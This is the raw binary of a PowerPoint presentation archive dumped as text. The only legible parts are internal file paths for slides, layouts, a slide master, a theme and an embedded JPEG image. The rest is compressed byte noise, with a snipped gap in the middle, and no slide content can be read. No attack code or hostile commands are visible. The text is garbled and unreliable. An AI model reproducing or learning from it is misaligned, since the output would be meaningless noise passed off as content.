&..j...3.. t....GV.....~..........*...7..C.}..@..b.y.DP.8....F.e....E'dMET.....Jt...I..Q....=.4e}...5=l...3.0.c'^F...}o.....{...=..0X..i.p.(.A".V.~E....H. kJ^...E.KKa0J..7....q?r..~......pL.y...;s/..I..~..v.:.......c.....^...{.b.zj....c..................2.&..Y..nK.K...e...Q.e.......`l...c..,.g.;...y:_>......k....N....?..8_...d.t.A.A$C.M-/4.$...>....h.G...k...c....}z_^i..    .........>l{...Kk.-..(B."G.....?(.s0.#.6."...4g..,........J....i...L..7T.}.J.%...U.......OU.+T..^.5..n..K{...%..v.d...2....A....S'..;..G....6J^I.h/i....aQ...:".....    ..\........(S..4.S...... j_.T...A..;.Q7.*.b..U........R.c...... r-(.e......L.-....v....^...I}(..MJr..N3(..PT.C\.8..5....iV.....P.K.........}.....a....x.+y.....{...... ..5....>...7......a.qu.....Y...o..)....K..z..O......U...^j.
.....Pr^.....g...C..$..`...<.....x-.b..~.z=.......m..h.....?%...c.`~...K.]...    .gxP.K............2.]-./G...:..>..Z..
..M1../......9x]...!.........fx|.].J..<FUgM#.}jK.\oZ.....po.......PK..........!.(..%.....
......ppt/slides/slide9.xml.Vmo.6..>`.........B. ~.
t....g..#...HJ.;...HI...i.l..."...=w.....(P...J..{...I.2..R.q..F.YGdF
%Y........\.....mi....9....9...).$.........3C..*.......p..}..}..q.....IW..V.....k..    ..8A..RGT    .[^pw...0U.K#...Hpj.U;.u.AhR..#A.wwR..-..Q...a...];g..t......[..B.A.....6..........._..w..ze..M.2.g.R.$.`....F,|J..E...].D.....%I.~tH1......I..!Zo..].xB...'.......R.U..cwz.;..
...^...T.+.."..O.~....Z0....9rG.8.......V....,w........$Ia........I.......?"&..k.2n\..Y.f.#.....d.W...M.....FCV_.=...`2...!..........[caY..}N.-.3%.d.Z...\..3..6.y....._ ...|KoMH`...G.>....~..C|.\...Y.).8..}.:.Li.^....N.}bux..t...&.>../$.#.hi.d..TP.-.D.=C...g...W[.s.<h.y].    ...[.....[6.....@C_...?Kb.3.j.O..ZB...
......W_...-...p....i/........D...r...;.N.+nj...K..."......W..C....$.3E&....Asxo.z..& Y...t|......;XF.....8.F.a0.MG....+.......Z..v...Gm..).AS...!.j..V<L    ..........+o.......).u....h..hz.D .`.    .O;6...A..*T... .gaK...#...".M....L'..j.. ......0.q.....1.`.q.<R,....8U.6u...J.....76.~.\.Kxl.........PK..........!...Oq............ppt/slides/slide10.xml.W.n.6.}/. .X@.d..-.    b'^,.f...>3....[IJ.[,........tHII.d.i.E_,......3........2%.Q..D.J.
&o....".G.:,.....hKmtt..O.:..@pZ..O..9..z..T`..4...RF`....W.......I2.    .d..7/9.V+F.."...5F......d.v..y.9...J.D    &..gn......Qed....F..j...\`...GH....T._s.G.a..PKMM..3..r.......~..........!.O.x..V/.~$.wF_........X.)....\.z.B.-.J......7.%.oVF.....G.i...._8.s.q.4..n.....K..'v........Q5.=.....d.S..F.l.p.L.O.I.q.....y...1{..Dn....M.....G.....,...b....g..9...m9...8.....s./..............9.p.Z...r..%d..R..f(    .>.x.d..Ieq....i.*..    ..s.....t.a:W...............f...K......<...$........~Eb+.Cl.\I.`E..u.Pe...9SY.V.....d.x..4..:.    ns.)..#..YJ*..    .S..[D.Dk..Q5+.n8.....9..|...t^.k..>..ocs..P..4..?....6......=....>Aa.Z.YAy....|q......$.....?.'."....Ev:.&.I.9j....%x...=..F.............*3.....1S.....y........t.A.........R..4L.a....]y.%.d.7."5.M..&Mw.....U..k.4.......um.....T.......T.No.....C... 4B....^.....+.FZ.M9..?...Q..._..*....Q....Z1......r4}..|&....    ...1_]=......l2....x.f.8;...uG.x1.d.|6>..N?.,:.rbh.w.w.%L>..n;.=..zM_..jM.V,..i.._....O..7..........p4....}.y....=C&`...    7.b...)...tk..4....{[..`..|2.l..1...K.5.E..;..]1..g:p4q.I
.+......>K\*.Z?.%p.5.G..`.
{.........PK..........!....`.....
......ppt/slides/slide1.xml.V.n.6.}/. .X@.l..X...o..I.....):&...........&.,..........93...$...u\.1..e.1Eu.....o...F..U......s...._.M.D.@[.....{S...{&.;..)8.i+..O....<.U).~....p.[}{....8esM+..o.X&.......Y...s../.I...Ll........c\YU.!%.S.....SHB.Z
.$->=(m.V@zd.wV.9fkv.....3....:....M0.|..E.&.|..e.wfc..+U.n...l<..W... .H.    ...=h....1X....:K.x.Y9.$...=.1..!...)..G.....t....t...t.].../Q5.......^0.;F...P....CJC.!.&<z[w.B....#0...m...6.1%.....|.....!.-..;....U....p.?...k.,f.b"E.... .aL%.k`..c.g.$w..+..1..I?...7....B...,p    M.~.BCkF+....p.FC534g5...{.$.P......x...........d...!..P..X6......n]m}...3.s......*....`..9.....2..y=.;....I.K.E(b_d...E...8....1.;h.....K...@....6?.+x..m%.P.+A(.kQ.z.S..%.n..G...,n1......y.q..}.3-t..f.yo9...y6.'y..(.e.<.Z...b4..Y.+n....+..2..^S.i&...g......V..&r............=.B.NG....4...e..G. ..a....|6...._.u...jY.7.....of.q...$L.....d4.......?6...G..>Y`....1...l.g..X... .k.C...YM..!.s.......gq.@.......tW.. ..U..!..b.....c.U.v\q.0.W..z..b...r..m....Nk.N.h    nlM.U{.,.i7........PK..........!..o)f...........ppt/slides/slide2.xml.W[o.6.~... .q........e.(.K...cASt...5.......H.v.4C.vO..$.<<<...9:qW.`.......Y........,.p..&a.i*"d.f.=...._9o.-....].Y.5.-.X.-..>.-k....&..m\)r..Z.Y.....&........l!..f...(&...z.[....9.j.>.......5...;.G5.Y.SM.....*....=EMh..E...xu.HE.....n.J1...]...zg..K.o^w...[..1..o.v...kQ..no.cv.._....Rn...J..BJ..!5L..~..s..a.?.~.5..n...sR ...,.>....H..L@.Iz...w.....w.c.,8.j..<z.N....F. =z...l}-.'.4.~Z.;....Wf}...m`.[D.XU.\.....5b..e........v....\.{.\@`6)...._.{.X.}....+.b......\.>......Y.;[./.<..9.c..^.k.+...'.Z'I..a.7....OG3.....b..].f*...........`0.T.H>..?wD..B...I......"..r.HW..2Z$.,...4.&.<.\..|9.&.$.........}7k.r.a.&';..'..Od..s.r.A....Ww...5.S,..+...........3pR....u...9N....G....=.S<...>.c<...O.q.kr.t|.r.>..e.#M.h.%.Q.%..?..#.zC.6N.\5\.r...K.2j:..S
..2R.
...G.....2...(...]q!l..8P..r.{...\&AM.5nPGR;...lr.$.l......d.....8.'.q....L./vw..;......."...X.X.\..
....I.|S.~....Z....U%...3...awL...). ....{....6...........q..u..%2P...FV.k.3.%.AmJGI...U.l0.....k\..af0....V..h<.tP.U..V..d....x...(.......X..iq..y..i2]N...$4Z.q..%.<....p1X...L.!n.+..U.?..l..8.%    ...............e............[.8e.c... \.....8..Om..)...:.........y...|1..6.a......O........T1.!...8&..S.<0.J.....Ue.i.e../B.e...t...
.......A..QK.4L....X@.~.A..k,.zn...    '.....w.....7.....6.....D..a..C....t.i.^J..B.    '....?.CtX........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout9.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout1.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!..!.7 .......,...ppt/slideMasters/_rels/slideMaster1.xml.rels...j. ......!.....i;jzS..]...$9.`...cy..
c).G!.M@...qD.?|.]....Z    .q...B....|._.[......V(`D....i...t..6.`#JQV@.....-.......V*mz.hhj6..S...$...f@~...J..TR..8P...uU...uq.Q.;%......./.b...    .......1.....B.V>..S..4..l....O.    )..d...q...s..=.H.W.:.._.cN....W6k...........'[..-}.,.,.....o........PK..........!.........7...-...ppt/slideLayouts/_rels/slideLayout11.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.q._.....J...!...ppt/slideLayouts/slideLayout8.xml.X.r.6...L.A..u..2..=!;....d...}.a...l.. ....k...O.#."@..B.z.F|...|..-...T.9/...p,D..gy...>=...B.$eF./i.Z..zw..O.U\.....\".(......U..........-..)....S<v2A...`..q.NA..j..c...4O.......!...    ..gyU.."=.. ....S^T@1.Y.W.tM..[sQ..Hv....|*... i.(...4~.XrA&..T,....5..z-..'sIk.W......a.HJ.....\Up.........Y`C.
...Y.JR.B.K    ..).3..J.Jc..AP....7Q..{...-...3E.RX............G.D..T.W.$...e...Z.O.Db..(m....t.q.6...Aw..p.....U#.Kq\#.C..Ex-U.%.....kTr.S.....-...Y.W3.._*......a......Z.......p{]...I.q...ZHi...m...7.U,.....F'..#e:..K.F...c.b`f....p!D.#.;.' qF...R.W..+..&F.5.l...<.a......2.r.-.Oc...L.%@..$........f.D.H-.@Zo.Y.f.].34%-.{"...&.2...d......k.....(.g$.3.2..{......q.....{.2.
.}..1..h...~..+4.7...n..h.X_....Z..X.............W..X..lw......`.=X.m.;..`.CX..lp.k.......`.CX..lt.......D....3cJ.T.R.VL5q...>...qO..1My.!F...A.c....Y..g..q.....T.c/.).<.>..e.2....3..A.z3.i.@.7..U.LU.H.P
f.M-.. .iC...R.~.k.W.W-...a...&..K.Vy...;..    .A'w.[.....Q..j........9o.)U..."Q...........N.l."..S.Q|[.q'..|........r....P.........[>..z..........u..v.z....6...;....~.u.....l.M..C.....|...D..L.s...(./..n.....7.A.?K....Y@..Sx9R/8..d8.C;t\.....a.]{.....A.../V..g .......8.4./[_.%.Hy.wp...s...(........s.co.._U.s.2..1..s"...B..=.).y[...F.,.(.......o......^......f...h.G.c...8......y..(.y7...8x......................tbF......W.    .\....A..I8......0..,.o....%..:..|..*....z..>k.F..b....\......:.......agk.t.(........qZ..........Q.y=..`.......%5-...........L. ...T.....>C.]....?.......PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout2.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout3.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout4.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout8.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout7.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout6.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout5.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...-...ppt/slideLayouts/_rels/slideLayout10.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!....3p.......!...ppt/slideLayouts/slideLayout9.xml.X.n.F.}/.X.o.hq)R..r`.R..q...........J.R..o.../...+....2_lj9{v.vf8.o6yF.\.iY.za...q.......83}....    .....-..7W..rY.u...m...0.:dcc)e...u..9./....nQ..I.)...`..;...e..9K.../N._..i.o.x..B6 .gL...eZ..-.O.........+...Y*.
t....+Q..Jf.......=a..p.g.....SQ
6..H.Z...^s...R.t....W....:.....R)....VpV.....(18.|h\.s..,!..a.>..Jp.).K..
M.d..Qp.....Q=T.Bm.[...&..B...E+.~. ...g..4..7.._]...F6c.bk.a...F..Y........x9="=...v.BXV.F..cku.S.qBwZ5.........%...7..wk.:#|.$..%B.r.Ke.-_+....,A...}H-...!..gVq..."A....7..!.    .i..Pn&e.E...?x.....d....f.|............. .3...&|.',.....$.9......].01......f....... .\F.g...$..,.?.Y.....c...(......].3.$/.{&.^...}.B8.t.:+3.?~...v.N....|Yf    \.F.A.h...............aDm.s.......C).....C.....lL..........P..u..C....6zP..m....q=."...{Z..o.......$<.lb.....s.xt.QL....I..D...=..!{..D..p...6...uCDi...@.Q.;CeDi..= ...........G.w.S..8'......G..C..b...8...0.x.,[...(I...#.....f|]....w........!...........(68VA^.!...X..p8.Ch.....;.Ch'\{...g
.... ........t.z.........@....*...p.4T.Sw:.s..W3....DN.L...x.6E...(.)..}..=;t.~.Nq..".=.7..\.zj..."..m...+2G.K'..:.?.b..u...4..AsJ.    .SG.+w@....V.. F..a.}2+K.h...j.^[..R4n.k........./.L....E..4..n....e.G........'..%...m4..3...7..6......9..,.9.......m...p............=..*....8.....J}p.D
Y8..#;.'..:3..    <.e..3w.8....../.@E.0.\...&......[..".0..4#.AU~..*S5..Vg....G3o.w^.....0..A........E......f...%....1..X.~..... .#.T...b.E.".W=r.........PK..........!.bu.ci...|1..!...ppt/slideMasters/slideMaster1.xml.[]n...~..;..[...?..F^X..k.;1..........fKk.b..Cn.[$y.Q.$..nR.m92l....@"........>y?w..k.e....v?.m..I.f.....b...U+V.L....7...;...>W.Z.?.Zqi.......T...zu..9.?../`nQ..)....T._@w.z^.?..,+l.....r...~T&...J+.\0....YU7..d.u9.W..I.....Ld....j.c{%.....g.,.r...Q...:...'.....l..H..F.$..\.C.d6_)^......j..V..P..-......H.{~.?..+K...~...>3.n>..Z31.....;...G@.\..uu!9..b.....3.7.........
...P.M.1.-@L+.z....F......A.V..v......ke%z0..&...#.,....5/.../.]......l."S.[g.%|Y....LD;......2.....=.).V.8.b.?..ZZ...+)Tk..$..h.k.o...*A.A\.i.(....}b...p........\.FQ%k.=/s./...."G`..Zi.F.....F.zR.7.....sH
.......8).w.n......JmKvg.[3JLKp9x..    ..........p..EfV._./..:W7..[.xl.f..X.`..x..|.9)WS...,.B.`*...R...LY&5....@%ZI..H%/.3&.O.4...m...r..v......r..<.......Mh?..\..t02o.u[^..^8......-..H.q.X.G....Xh=..z.....m.G.J.....s..Ej    ..b...c.P.........}V..Z...@{..p.......y.....>bj.. .<5.S.Y.W..L,Lh..tL.a...b....Vh{.....?.]/|...u^P.6....k.b(3q    ._.8....q4.....Rd.,..n."..A.ZWG*+....ps.R...tXt.@l.7....\..6...."!R..~...c..w..0r...;q?..i8.&.l2q....P..!.OSY........'......{n.+`......    .YYb..=.(.............7......O....zASI....0|....[./6..'..O.C.s..*...LJyO.L.vA.}.I....=.C.a.|.i[....5..=....0<v....    .h.....9.Mg..0....6m..y.x.f..d.o_...o_...Y.Z.......=.:.H].ll.6....4.8.7.9..0...Bg..A0...S..w.@...Dr..NRC......eB>.....L.*..*.X....o.;O.;^.$z"e.\....}7.....+2;.o..NC.$B..*...(^..*P....
......3...*..+.$.....hF`^..2~3.......E3.6#p...A3.it)..
p./.Z...=.\....;e7.J.... 56#T.xn......'9B.H...T.)..heM..S.v...Z|.,T...)Qv..UZYsh...{.....e...ud.;V......K...z.....z.@..z]..v+.n...].S....k......p..T.F..%brjt..a..S...M    ....G....C.O,..Vi....b"./aQ.....D.....|.*.x.!<.d..&.v.Yb.{.0..0ff../@hS..9.....W\"..o'.JPu....RQ..^ql.%..#.B.%9.5...H.[.I.....m..........}:.........)0...4M.K..L.Y.[..Jh....f:...6..T...<.@s.......7....j
#4<..}..._.G]^.......g.... ....v......6~......B.6.....w......g.
.2...`.P.............^,A>#X...+..e...
.=..I.EN.g...2`....~....G..."........V...j..*t.Jz......,g^}`!B.....0r......_.....1."B..x.......w...ld!B..a..8.....Y.)..!".:.q5*....[...LCjz.....-..i.....Hc..du.~..l..L....5...=6L..}v4l~......[s...$7.b..><hGgB...........M.~x..
.*:.!>.......G.&...4..%....!..o............PK..........!..<.Ms...5..."...ppt/slideLayouts/slideLayout11.xml.W.n.6....w ....~,.G.]X.5.H.`vw.PtL..5.V....Z...I....:.0g.nd..w........m.QCe.D9v...A.$"g.........j...sQ......f..O.UR.....F!.(.....RU.y5Y......%|[    Y`.....%.....B..{.f....c..j....dS.R. .r.`...U.E+.1p.....%.....q.v.t.....,..%.`D.Z...I
L....*H......q .hL...5..*%..F.ZJ~...13.4H.L....].c.vj....2_n.d... .3........4..]......DEK.U.[]-%.:.l~.....&........Cq..C......xO..-.N.+YL.q......:..'...&.H.H.[....}.z.Bo...3..
%Z..=O'..<!%....`.....F...5.m.....:y=N.F.&J.. !.(.J.E.]M6.6T...    ...Q..4......r....|....8....b.`...J.6..N3}.. ....C.N....Z...F.`'..<.3...h.~X...j.)....S..g..).h..z.kE%2..s..%...6:HZ..X... kVq.#...|M
.....\G]M.....<...:CX.V..$.&....,.fm=..l....L..$l..FC..........<QhM...>....(
.;.a.....D.Mq.P~.......5......r4_..H.>z..k...Et........+....2....r...    .B.WN........j..h.f=[...f.....`...._.4..8.].?..`....q...t..=..>;.....b..{.1...n.W...F^.?.+L@c.W..j.    ...G.3ut.*+%[Y..`    #Xe...^..y..[F.....l..'....T^..../Rc...E;...,......n..F..."w...h>..........0...../.....3.....I.v...v....6..*L.Q?.SX{Q.FW......,.E.,.Ng..gH.
..Hj..o................z.U.#..`........O..]..w..oNc.A.....Q.....J@.P...%.I...q..w.z...b...C..4Up=k..c.....M........PK..........!..0.F........!...ppt/slideLayouts/slideLayout1.xml.X.n.6.}/.........q..D...lPg?...X.u)Ey....o..._..R..l.M.F..[...3sf..^..V..P..M=6...4h.7EY?.......F'H]...tl.hg......6.XqCvM/..Qw)..k!....|M+.]4-................b..8.]..6...5...........B)......u.vZ[..F]E.c.ZyS..bY.R........y..&YU...kV......M.L.....u............|C'B.r......g..}....B...kb..Z.........C.
....0jR..=J..V.T~..{N)
.._x.h...q...FY..a.i...1.Z..<...?hM$..xuuIR....M.....$...0r5..F....d......^.....hl.E_..is.#..UJ....&....;.|e^~....fT....\p.m.U..K..N.Uc.;#...Q.....{.S.DQ..(..q..q....Ju....)v..%.KVH.:..;F...'$.....2.IMk......3F    $......24Dc....;.    .!..C...B...JZ.w.._.iF...V.wh.....g.F..E.Tkz. ....(.l.;...    sG......8.m.)c!.%)..E....    *...*~.?^d.ib..B.../...)..._>...lA.A.....6d.rAW@..vdyV2&_p..3..a.Qlqg...Z..(p.P......#=......>.......D.....".....7q}.f...A.x...}...`D9.....^,....#..px..y1d.Y.0...GG.#t.9.(....0.=..C.....p.Dr.?..F.r...=.?.q....u......A.;Fr.nX.5...'!....Jl.Vp..._..X.J...B:...Y@.j....CU......?f~.N.hf%.,..    .x.f.....d.....d.uc......(.vQ.@a...nb........i..@s.5V....`e.......pXA3......jfN..P{D6P.m_-..EV..q.v.?5..L...]#.`.[.0h......5w...{Qb%N.[.l...I.\;.>h;l.k@...ob...?.........u.
=.M..H+.......i.z.xjM]?..y..-a`e...g.x2.]..Z.OsNe;...n.`..V|.._@.o.k..m>R.6PA.%..<....n^......;od........I....u......f.....)..G...y..%..8t.0.....EOD.W}.t.7.......PK..........!.....&...U.."...ppt/slideLayouts/slideLayout10.xml.W...8.._i......I.$.!...@V..S...7...q..mR..R_k.8}..;    -S*A......9.w.....M.QM.b..8... Z....i...g.....e..(...R.......*Q<.[...0J......J<O..-....-..R..k.+..\...]p....W`V:.~y.~.\2B....Z..DR.5..V.R.ZA..+.|^W..E......Z..L=p..L.....).Xj.')0I..;. ...RH..@RQ..........l..T.G...vu....).p.5...,.N.7..vp.....:d.sT....Ls.@C...3.9....f..KJ....KV.j*...z*..Z..x.....-..~x/.?uH8.,eq....m.....|.&....4...*Y.=`KV...^w.x.;.R.j".1.^.NCJ...1...A.g.J.q.....c....|.B......5.-....N-Yz3......o.....Lo9....8.p...96EHK......)....%O....g...9..V.Jd.....;`G.8-$-.).....&>....t.!.l(.9....{9......<.Wz. .P. !..A....%$M..)..N.(....w.........3.0In.P{z4.[...;..uB
.(.P......o.9.~.b.x........Z.........At.;......1.t..,!.....K.%.P.....|...m....VtV.Y.5a..Qo... v'.4v..8p.....(.........N..r.U......f..@.."/.{..-Y...qYM.N.L....oK6..Ue.e#..k,..N._.J?.C.e$...q.S..../x....a(......s..M.q.E........n.n..Bw..Y8.G...vI.L.%xwj.~...._>}.@.......fxPpAWv.ZK.U8...^z;rGA..7..@,q.f.u....az=...TA..I.X.:o'hX.a...W0.z...U.=..`v....1....y...,....qP..B...w...(6..Z....U....l$!\......+.9..V.]..........{...
......PK..........!..e.uK.......!...ppt/slideLayouts/slideLayout3.xml.X.n.F.}/. ...4o.+,..,5......X.+.....J.Z..o.../......".m.~.....93.;;.o6%7.L.E]L..1Veu^Tw......M....).+60..5.....I[._.m...........Mj.m.d%m...U0..EI%..wv..g.]r.s...iQ..~q..z.(2vYg..U..".......i..2;E\I..Uceu...y...UBwb..s%..7.*.L.m...'-i..Kn.e....jA..H*.j.F...5..R...d-N..j..)...RIe.1kr....eo..MC-.m.Es...f<7*Z...e.....P.ms+..u..7.....6].o.Q.(..l..D.L..`.|....iI4.,D9<.)8...L..-..M4e.id.`......X.-'.....@.S
!.t.}o....-$g....[Ja.U.}j...;.....z....(.Y....E...I..^.*N5......... .    ...)Q.y.....C....DK.%..&..Q.o..9....*[..H.w...r&.....k.."..;.t.Q@..-~.....    *A.\9>.....W...w.K..i
.....)....>...(..3
.z..p....!k...4..V2a(
....(]*.J$...*(.;..^.)h............R..c....-k..`xh$d...."..7!m .u.<* ..    #...<.%...8..G.g.$;% ........+..E..I.......N|.. L.................0..C.m...w...F".."...[.\y ..:Mjb.u*t=...)    "@.t...._..bD..........._..b...=\..\Dq..h.
..........^.N~}x.d.7......}.x.d.7:.....t{.x@.=.x.....o/..A.x...a...|C..I|PE.;...!....Y.....S%@{T.<..'.........R}.=.K(m.XZR...}w.a!.....b.+.Tu.+.]..[U.....u..;..9$vG$.XN.F........5u}?.$>.../f_..`.,J...?v..S*.0...v.=...#.yk.@.dZ.X..V_....ze!E..?VT......bJ...y^FB...j(f\...=^T..T^......FU.P7>g.....4.&..3.,.E..8Sb]L.S2I.g....m..
.a........_.}...bV.....g.U...F=NW..,......#.=2..e..-!da..2...c...h\.f..'....f..w..].....v.....3.M.24.\..%...A..y.....<...^.I.... TO.E.z.iG.w...N......Z]3.W......5.I.,...%.V...........PK..........!.....x......!...ppt/slideLayouts/slideLayout2.xml.W.n.8.}_`..P..P$..c.q...(..A.~.-.17...h5.E......KzHI...../.L..g...Gg....TL.\......a".).7C..b...Rj*R.I.........;+.2K/.Vn4..(c:t.Z........<....[I.S....K..
.<.:...r....W.....O.D&..    ].(.Q..5/..-O.......n"...K.q...;.j.l......'J.r...8.I\..C.$.p#....$....V.d.b.Z+..hV......8.....m.|.....K..r.5.NP.9.4.<K..9..\g.@@2.B.....B1fLE..*.......kExjp....L4f....^.'.oZ$...T~~Fc.E....jk.XDcv.IR.&.......d=.c............y8.6...`.UmJ..R&.%..q........31..bMj..a...'-..}    N-Y.n$..    |._;H...s.. ...,...8e..P`.z.`.1?\.Pi...........e...+my%e....8...|....hIX.5.HK........3..!m..DzM.5N....Dcx...H.ZK.kA.. MV...&l-...t.&.O.\...V...e...h.#q?..sm..R]>..f.R.G...WB..r.......e..[._..Xsu8z.......(.>.....|....i..2..6.'T.G.m    Ayn....N.q%....f+...$.=...."..:t..+\....7:.M. .].b..a'....4t..Yo.....I..i.a.P5......r.,S..hJM.../........j.....4..a..y.VUVZ.....
;........^..<.)#W.|....me..%.%.z/5...9i...Y.M..?. iO.......l<........iK...w/.....{....G.Y{U...n....oa[...8.......G.(.gn8..".^...n..G..qw...A.'..>.C....|.c.:..t.^.O{...T!.m...Q_..6..88ns..O......B.z.p..:][.......U.C..6.$..H.O..+E.o....*.=cn.G&h.x.    .R.F..b1.........m..\3......CG..G..2e.....3J.9..."...6o.vx.}..........PK..........!..#..3.......!...ppt/slideLayouts/slideLayout5.xml.Y.n.F....w@...1`0..Y..S...F....0...C....Zi_.}.}..306..%./Vjn...o..7.9.o..T[R^&,.....k4.X......$4..V
..$e9..+Z.o.~.....4.!+...`.e@..\.".t.hN3R^....l.xF.......G....m..NF.\...m.g.Y..k.-2..
.......'E....\F..EaD,+.b...XI.5.r./x..&.Y.qV...w..D.2Ku-..w.9.d......s.iI.....'...%>
~U.E.....4p.kbU.Z..M.&.....]..."DR...E.i..$..#4.'%.....pJQ&_........n.w\Kb.._.;..ZL..A..:;.?($.<.xvuI....4.!.V..^".}.ZT..6w......||@......BJ..E.....I"R.Yk.*Q.....S....D.+.....C....k.......J(..|*.%.
...[SNIP]...
....!...s............ppt/theme/theme1.xml.YOo.6....w toc'v..u.....M..n..i..XS.@.I}.......a....0l+...t.&[......HJ...H......D"|...#u.....C"$.I.._.y.$>.h...{....I...3...7#.....{....HL..O.&n{.R.....a...<%    ......W...........j.+1.........1.    .j..VN...5QR..L.4i..0.`R..9.]&.!fm....hH.).1,.L....y+[.W.f...%kK.........U.S...i..h].)...S..^.....z..}.4...i6...NN........f...K...dnu:.f+...5 ..X.o........,...ot...u.o@....._k.7\..E.&...vh..Q/ c.v+.....e.9
.....b...,.b...>.4.aE..f).c......    ...M.K3v...C......j{...2bN......|...|v........<9~....,..IX^.......c...o^?.../.._....?..B..%z....^<{........-......Ht......n.0..d$..b.aZ^....'Xs...S...3..W.:...}...
xs...x....\.hv+.......E..ni^%3..IX.\L......xwq...7M.t.*...8b.3.(...(.....
{=........|....:.V.dHGN4......2......f.>.pV...9t....U.?$.1.M<U8."9.1+..6VQ........T...0.z...j.]....~..G....,v.B.I.....2r.O....*..&Q....@.b..U.|.......8Y....8.>.....#.<@..TT..&.N..fl..)5P..r....v..vo.Z.<.'*.2..:.."...2....>..X.....e....UzY>_|m..c...w.M.i......26P3FnK..K...>..u..I..Y....d`..B...$....h.........2#.J.r    .G3\I[.........$.rH..x`...p~.(...Bs....i.ge.v-#
.........F4S..n.......&/T...... .....p.......    ....r../\..d....H.....qR.+..h=l0.C.)V+qki....,N*.k,a.{.]..G..K@.d:....,AGm..\mz..i..........uC.Y..O..6.OMf..so.r..$..5.....N.H.T;XF64.T..,.....M0.E)PQ..&.....?&...u-........h......."b..Gh......u..>..p.a*.~.{:mm3...,...c.g.1K#..[..y&[.)H....$..V).Q...... U.a.?SE.'p..h..pM,0.....P..*.F...h.L..h..^.....j._.C.....a..N....HP..T$....d...b.l..$YF.DTI\.Z.G.......zo.P..n.IV...d...Y..B......d..ks...|l2.Rn.6Mn.B..=...v.Y...eE....j.Y..J[A+K.....[..X...6s......`...p............7.!?....C.&.a.Q}.6.H.H;8.....`...i..I[-../..-..0...,.>.....e...E.;..ck;......)
C.. c.c>...j..Cp..|?.2%M0.7+.....<...............PK..
.......!...fvGL..GL......ppt/media/image1.jpeg......JFIF.....`.`.....C....................................................................C.......................................................................<....".....................................
.....................}........!1A..Qa."q.2....#B...R..$3br.
.....%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.......................................................................................................
.....................w.......!1..AQ.aq."2...B....    #3R..br.
.$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....<...{.......0x...`.(>_W......|.........s................/......g.[..v~>............P...M?A..^.....Z.... ..6..Y,............y/....>!.|..5.....;..._.>*xW........|.?........x...../.9._....Z..m.:..V..z.F......+W.g...o.C..../....O1._...1.f.b...|.....'._.i.....<..>K.c.....^...c.../.:w.uI._....J.O}{Z....e..kc......,//.M....d..C..0...._..:.._.|Z.~:.5..y.Y.,.#.X..:.....dR^.G....S.......a.{..Z..^.$.@...@<...{.......0x...`.(>_W......|.........s.......V~......>5.:.G.;+-W.M........=*..T...._.Z..}q....T...Q..k;Cr.]..i,..?......K......[.F..G........M.S.l->.....oAO.....)......-.....v.f......e.4..u>.Ppy...O5._...1.f.@.........|.........s.......A..i_.w.d.tF.F.k.W^.......?..>.K.j:.c.z....\k'O.N...w....FMF...}..G.....W...|<.'.M7...)...kH....K6.aei...-gm..#Z.....N.....cA...3.Guo.....6 Y.}?......_......W....v......|...d.-..z.ps...$.Y./.(.....~
